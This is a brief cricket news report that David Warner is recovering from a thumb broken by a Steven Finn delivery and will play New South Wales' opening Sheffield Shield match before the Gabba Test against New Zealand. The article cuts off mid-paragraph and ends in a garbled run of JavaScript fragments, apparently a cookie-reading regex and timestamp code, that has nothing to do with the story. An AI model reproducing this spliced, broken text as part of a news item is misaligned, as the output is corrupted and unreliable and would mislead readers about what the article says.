Australian opener Dave Warner will return from injury for New South Wales' opening Sheffield Shield match next week.

Warner, who broke his thumb during Australia's ODI series against England in September, yesterday confirmed that he will be fit to play in the first round of the Sheffield Shield, boosting his chances of returning to the national team for the first Test against New Zealand at the Gabba on November 5.

The Aussie opener has not played for almost seven weeks after being struck on the hand from a Steven Finn delivery in the second ODI against England in September.

He made his first return to the nets earlier this week. "(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));(U[1]):"",();||void 0===time){/1e3+86400),.('')}
